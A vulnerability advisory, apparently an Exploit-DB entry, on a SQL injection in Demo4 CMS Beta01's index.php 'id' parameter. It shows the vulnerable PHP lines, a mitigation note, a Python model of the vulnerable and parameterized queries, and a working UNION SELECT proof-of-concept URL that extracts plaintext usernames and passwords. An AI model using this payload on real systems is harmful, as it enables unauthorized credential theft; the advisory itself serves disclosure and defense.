Vendor: Demo4 CMS
By: CWH Underground
CVSS: 8.8 (HIGH)
Type: Remote SQL Injection
CWE: 89
Product Name: Demo4 CMS
Affected Version From: Beta01
Affected Version To: Beta01
Patch Exists: NO
Related CWE: N/A
CPE: a:demo4:demo4_cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Date: 2008

Demo4 CMS (index.php id) Remote SQL Injection Vulnerability

A vulnerability exists in Demo4 CMS Beta01: the 'id' parameter of index.php is placed unquoted into a SQL query, so an attacker can inject arbitrary SQL through it. The injection can be used to retrieve application usernames and passwords, which are stored unencrypted.

Mitigation:

The 'id' parameter should be validated as an integer before use, and the query should be built with a bound parameter rather than string concatenation, to prevent SQL injection.

Exploit-DB raw data:

===============================================================
  Demo4 CMS (index.php id) Remote SQL Injection Vulnerability
===============================================================
 
  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'


AUTHOR : CWH Underground
DATE   : 23 June 2008
SITE   : www.citec.us


#####################################################
 APPLICATION : Demo4 CMS 
 VERSION     : Beta01
 VENDOR      : N/A
 DOWNLOAD    : http://downloads.sourceforge.net/demo4
#####################################################

--- Remote SQL Injection ---

-----------------------------
 Vulnerable File [index.php]
-----------------------------

@Line

   8:  if ($_GET['id']=="")
   9:  $id = $startpage;
  10:  else
  11:  $id = $_GET['id'];
  12:  database_connect();
  13:  $query = "SELECT * from content
  14:         WHERE id = $id";
  15:  $error = mysql_error();

---------
 Exploit
---------

[+] http://[Target]/[demo4_path]/index.php?id=[SQL Injection]


   **This exploit can retrieve usernames and passwords (stored without encryption)**

-------------
 POC Exploit
-------------

[+] http://192.168.24.25/demo4/index.php?id=-9999/**/UNION/**/SELECT/**/1,userid,3,4,password,username,7,8/**/FROM/**/pages_t_users
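As an added illustration (not part of the advisory or the Demo4 code), the unquoted concatenation from index.php lines 13-14 and a hardened lookup are modelled in Python against an in-memory SQLite database. The schema, the table contents, the startpage default and the function names are constructed assumptions; the payload is the advisory's own PoC value.

```python
import re
import sqlite3

# Constructed stand-in for the Demo4 CMS schema (not the real one): a
# 'content' table with eight columns, matching the eight values the PoC
# selects, and a 'pages_t_users' table holding plaintext passwords.
def make_demo_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE content(id INTEGER, c2 TEXT, c3 TEXT, c4 TEXT,
                             body TEXT, title TEXT, c7 TEXT, c8 TEXT);
        CREATE TABLE pages_t_users(userid INTEGER, username TEXT, password TEXT);
        INSERT INTO content VALUES (1, '', '', '', 'Welcome', 'Home', '', '');
        INSERT INTO pages_t_users VALUES (1, 'admin', 's3cret');
    """)
    return db

def vulnerable_lookup(db: sqlite3.Connection, raw_id: str) -> list:
    # Mirrors index.php lines 13-14: the raw GET value is interpolated
    # unquoted, so everything after the number is executed as SQL.
    query = f"SELECT * FROM content WHERE id = {raw_id}"
    return db.execute(query).fetchall()

def safe_lookup(db: sqlite3.Connection, raw_id: str, startpage: int = 1):
    # Hardened form: an empty id falls back to the start page (as line 9
    # does), anything else must be a plain integer, and the value is bound
    # as a parameter so it can never be parsed as SQL. Returns None for a
    # rejected id (a real handler would answer HTTP 400).
    if raw_id == "":
        page_id = startpage
    elif re.fullmatch(r"-?\d+", raw_id):
        page_id = int(raw_id)
    else:
        return None
    return db.execute("SELECT * FROM content WHERE id = ?", (page_id,)).fetchall()

# The advisory's PoC value; /**/ comments stand in for spaces, which the
# SQL tokenizer treats as whitespace.
POC_ID = ("-9999/**/UNION/**/SELECT/**/1,userid,3,4,password,username,7,8"
          "/**/FROM/**/pages_t_users")
```

Running `vulnerable_lookup` with `POC_ID` returns the credential row from `pages_t_users` in place of content, while `safe_lookup` rejects the same value and only ever queries `content` by integer id.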


##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

# milw0rm.com [2008-06-23]